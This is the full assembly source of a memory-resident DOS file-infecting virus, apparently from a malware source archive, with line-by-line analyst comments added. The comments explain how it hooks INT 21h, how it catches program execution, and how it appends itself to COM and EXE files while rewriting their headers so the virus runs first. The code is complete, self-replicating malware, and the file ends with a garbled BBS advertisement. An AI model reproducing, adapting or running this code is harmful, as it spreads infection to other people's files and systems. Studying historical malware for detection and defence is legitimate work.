MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.smal.asm

; ---------------------------------------------------------------------------
; Analyst notes (added on review; the code lines below are unchanged).
; Syntax: MASM/TASM (segment/assume, `this word`, `word ptr`, `offset`), not
; NASM as the repository tag suggests.  16-bit real-mode DOS, one segment,
; org 0, position-independent via call/pop (Label1).
; What this listing does:
;   * Memory-resident appending infector.  Begin copies the body into a
;     freshly allocated block and hooks INT 21h; NewInt21 only reacts to
;     AH=4Bh (EXEC) and appends the body to the file about to be executed.
;   * COM hosts: first 5 bytes replaced by JMP rel16 + marker word 0ACDCh
;     (Header/Signature); the original 5 bytes are kept at SavedCode.
;   * EXE hosts: the 18h-byte header is rewritten so CS:IP points at Exe in
;     the appended body; the header checksum field (offset 12h, ExeSignature)
;     is compared with 0ACDCh before infecting.
; Resident indicators visible here: word at 0:46Ah = resident segment; a far
;   JMP (0EAh) to NewInt21 at 0:467h; INT 21h vector (0:84h) set to
;   0046h:0007h (linear 467h), i.e. pointing into the BIOS data area rather
;   than at the virus segment; MCB owner of the resident block set to itself.
; ---------------------------------------------------------------------------
virus segment public 'code'
assume cs:virus,ds:virus,es:virus
org 0                                   ; body is relocatable; real offset found via call/pop at Label1
VirusSize equ VirusEnd-$                ; byte length of the body (copied resident and appended to hosts)
; Entry when a COM host starts: install (Begin), then restore the host's
; original first 5 bytes at 100h and jump there (Label2).
Com: call Begin
call Label2                             ; pushes offset SavedCode as return address; Label2 pops it into si
; Field equates into the 18h-byte area at SavedCode, laid out as an EXE header.
PartPage equ this word+02h              ; bytes used in the last 512-byte page
PageCount equ this word+04h             ; number of 512-byte pages
HdrSize equ this word+08h               ; header size in paragraphs
MinMem equ this word+0ah
MaxMem equ this word+0ch
ExeSS equ this word+0eh
ExeSP equ this word+10h
ExeSignature equ this word+12h          ; EXE header checksum field; compared with the marker 0ACDCh in ExeFile
ExeStart equ this dword+14h             ; IP:CS of the original entry point
ExeIP equ this word+14h
ExeCS equ this word+16h
; Saved host bytes: 5 bytes of a COM host (defaults to a DOS exit, so a
; bare dropper simply terminates) or the full 18h-byte header of an EXE host.
SavedCode:
mov ax,4c00h
int 21h
org SavedCode+18h                       ; reserve the rest of the 18h-byte header area
Label2: pop si                          ; si = offset SavedCode
mov di,100h
push di                                 ; return address for the final ret = 100h
movsw
movsw
movsb                                   ; copy 5 bytes from ds:si back to es:100h
ret                                     ; jump to 100h
; Entry when an EXE host starts: install, then add the load segment
; (ds = PSP, +10h) to the saved CS/SS and jump to the original entry.
Exe: call Begin
mov dx,ds
add dx,10h                              ; dx = load segment
add cs:ExeCS,dx
add dx,cs:ExeSS
mov ss,dx
mov sp,cs:ExeSP
jmp cs:ExeStart
; Begin: go resident unless a copy is already installed.
; 0:46Ah is used as the "resident segment" word; Signature is checked there.
Begin: push ds
push es
push ax
xor ax,ax
mov ds,ax
mov ds,ds:[46ah]                        ; ds = segment stored by a previously installed copy
cmp Signature,0ACDCh
je Exit                                 ; already resident
mov ah,4ah
mov bx,-1
int 21h                                 ; resize to -1 fails; bx = largest block size (paragraphs)
sub bx,(VirusSize+1fh)/10h+1000h
jb Exit                                 ; need room for the body plus 64 KB
add bh,10h                              ; bx = largest block minus the body's paragraphs
mov ah,4ah
int 21h                                 ; shrink own block to leave that space free
mov ah,48h
mov bx,(VirusSize+0fh)/10h
int 21h                                 ; allocate a block for the resident copy
jb Exit
dec ax
mov es,ax                               ; es = MCB of the new block
inc ax
mov es:[1],ax                           ; MCB owner field := the block's own segment
mov es,ax
push cs
pop ds
call Label1
Label1: pop si
sub si,offset Label1                    ; si = offset of the body within cs
xor di,di
push di                                 ; saved 0, popped into ds below
mov cx,VirusSize
rep movsb                               ; copy body to es:0
pop ds                                  ; ds = 0 (interrupt vector table / BIOS data area)
mov ax,ds:[84h]
mov word ptr es:OldInt21[0],ax
mov ax,ds:[86h]
mov word ptr es:OldInt21[2],ax          ; original INT 21h vector saved into the resident copy
mov byte ptr ds:[467h],0eah
mov word ptr ds:[468h],offset NewInt21
mov ds:[46ah],es                        ; far JMP NewInt21 written at 0:467h; 0:46Ah = resident segment
mov word ptr ds:[84h],7
mov word ptr ds:[86h],46h               ; INT 21h vector := 0046h:0007h (linear 467h), the JMP above
Exit: pop ax
pop ds
pop es
ret
; Five bytes written to offset 0 of an infected COM file: JMP rel16 + marker.
Header db 0e9h
dw 0                                    ; displacement filled in by ComFile
Signature dw 0ACDCh                     ; marker: checked at COM offset 3 and, via 0:46Ah, for the resident copy
; INT 21h handler: only AH=4Bh (EXEC) is intercepted; everything else is
; passed to the original handler through the far JMP at EOI.
NewInt21:
cmp ah,4bh
je Exec
jmp short EOI
Exec: push ax
push bx
push cx
push dx
push ds
mov ax,3d02h                            ; open ds:dx (the EXEC filename) read/write
call Interrupt
jc short Error
push cs
pop ds
mov bx,ax                               ; bx = file handle
mov ah,3fh
mov cx,18h
mov dx,offset SavedCode
call DOS                                ; read the first 18h bytes into SavedCode
cmp word ptr cs:SavedCode,5a4dh         ; 'MZ'
je ExeFile
ComFile:cmp word ptr cs:SavedCode[3],0ACDCh
je short Close                          ; marker present: already infected
mov al,02h
call Seek                               ; seek to end; dx:ax = file size
or dx,dx
; jmp short Close
cmp ah,0f6h
je short Close                          ; skip when the size's high byte is 0F6h
sub ax,5
; jmp short Close
inc ax
inc ax                                  ; ax = size - 3 = JMP displacement from 103h to the appended body
mov word ptr ds:Header[1],ax
mov ah,40h
mov cx,VirusSize
xor dx,dx
call DOS                                ; append body (ds:0, ds = cs) at end of file
mov al,00h
call Seek                               ; seek to start
mov ah,40h
mov cx,5
mov dx,offset Header
call Interrupt                          ; overwrite the first 5 bytes with JMP + marker
Close: mov ah,3eh
call Interrupt                          ; close the handle in bx
Error: pop ds
pop dx
pop cx
pop bx
pop ax
EOI: db 0eah ; jmp 0:0 -- far JMP opcode; its operand is OldInt21 below, so this chains to the original INT 21h
OldInt21 dd 026b1465h                   ; placeholder; overwritten by Begin with the saved vector
; EXE host: pad the file to a paragraph boundary, append the body, then
; rewrite the header so entry is Exe and SS:SP sit just past the body.
ExeFile:cmp ExeSignature,0ACDCh
je short Close
mov al,02h
call Seek                               ; dx:ax = file size
add ax,0fh
adc dx,0
and al,0f0h                             ; round up to a multiple of 16
xchg ax,dx
mov cx,ax                               ; cx:dx = rounded size
mov ax,4200h
call DOS                                ; seek to the rounded size; dx:ax = new position
mov cx,10h
div cx                                  ; ax = rounded size / 16, dx = remainder
or dx,dx
jne Close                               ; remainder must be 0
mov dx,ax
sub dx,HdrSize
push dx                                 ; paragraph of the body relative to the load segment (new CS)
mov cx,10h
mul cx                                  ; dx:ax = rounded size in bytes
add ax,VirusSize
adc dx,0                                ; dx:ax = new file length
mov cx,200h
div cx                                  ; ax = full 512-byte pages, dx = remainder
inc ax
push ax                                 ; new PageCount
push dx                                 ; new PartPage
mov ah,40h
mov cx,VirusSize
xor dx,dx
call Interrupt                          ; append body (ds = cs)
pop PartPage
pop PageCount
pop ax
jc Close                                ; CF still from the write above (pop does not touch flags)
mov ExeCS,ax
mov ExeIP,offset Exe                    ; entry := Exe inside the appended body
add ax,(VirusSize+0fh)/10h
mov ExeSS,ax
mov ExeSP,200h                          ; stack placed immediately after the body
cmp MinMem,20h
jae Mem1
mov MinMem,20h                          ; ensure at least 20h paragraphs beyond the image for the stack
Mem1: cmp MaxMem,20h
jae Mem2
mov MaxMem,20h
Mem2: mov al,00
call Seek                               ; seek to start
mov ah,40h
mov cx,18h
mov dx,offset SavedCode
call Interrupt                          ; write the patched header
jmp Close
; Seek: AH=42h with cx:dx = 0 and al = origin (0 = start, 2 = end).
; DOS:  call the original handler; on CF the caller's return address is
;       discarded and control goes to Close (handle closed, host still runs).
Seek: mov ah,42h
xor cx,cx
xor dx,dx
DOS: call Interrupt
jnc Ok
pop ax                                  ; drop the return address of the failed caller
jmp Close
; Interrupt: invoke the saved INT 21h vector as an interrupt (pushf + far call).
Interrupt:
pushf
call cs:OldInt21
Ok: ret
VirusEnd equ $
virus ends
end
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>